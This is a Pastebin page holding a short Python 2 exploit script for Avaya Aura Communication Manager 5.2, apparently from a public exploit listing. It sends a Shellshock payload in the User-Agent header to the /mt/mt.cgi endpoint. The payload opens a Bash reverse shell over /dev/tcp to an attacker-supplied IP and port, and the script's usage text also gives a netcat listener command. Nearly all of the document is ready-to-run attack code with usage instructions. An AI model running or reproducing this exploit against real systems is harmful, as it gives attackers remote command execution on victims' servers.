SHARE
TWEET

Untitled

a guest Feb 18th, 2020 72 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
  2. # Exploit Author: Sarang Tumne a.k.a SarT
  3. # Date: 2020-02-14
  4. # Confirmed on release 5.2
  5. # Vendor: https://www.avaya.com/en/
  6. # Avaya's advisory:  
  7. # https://downloads.avaya.com/css/P8/documents/100183151
  8. # Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
  9.  
  10. ###############################################
  11.  
  12. #!/usr/bin/python
  13.  
  14. import sys
  15. import requests
  16.  
  17. if len(sys.argv) < 4:
  18.     print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
  19.     print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>"
  20.     print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
  21.     print "[*] Netcat Listener: nc -lvvnp <port>"
  22.     print "\n"
  23.     sys.exit()
  24.  
  25. #Disables request warning for cert validation ignore.
  26. requests.packages.urllib3.disable_warnings()
  27. CM = sys.argv[1]
  28. url = "https://" + CM + "/mt/mt.cgi"
  29. attacker_ip = sys.argv[2]
  30. rev_port = sys.argv[3]
  31.  
  32. http_headers = {
  33.        
  34.         "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
  35.            
  36.         }
  37.  
  38. def main():
  39.         if len(sys.argv) == 4:
  40.          
  41.           print "[+] Success, spawning a shell on your custom port :)..."
  42.           requests.get(url, headers=http_headers, verify=False, timeout=5)
  43.        
  44.         else:  
  45.           print "[-] Something went wrong, quitting..."
  46.            
  47.         sys.exit()
  48.    
  49.  
  50. if __name__ == "__main__":
  51.     main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top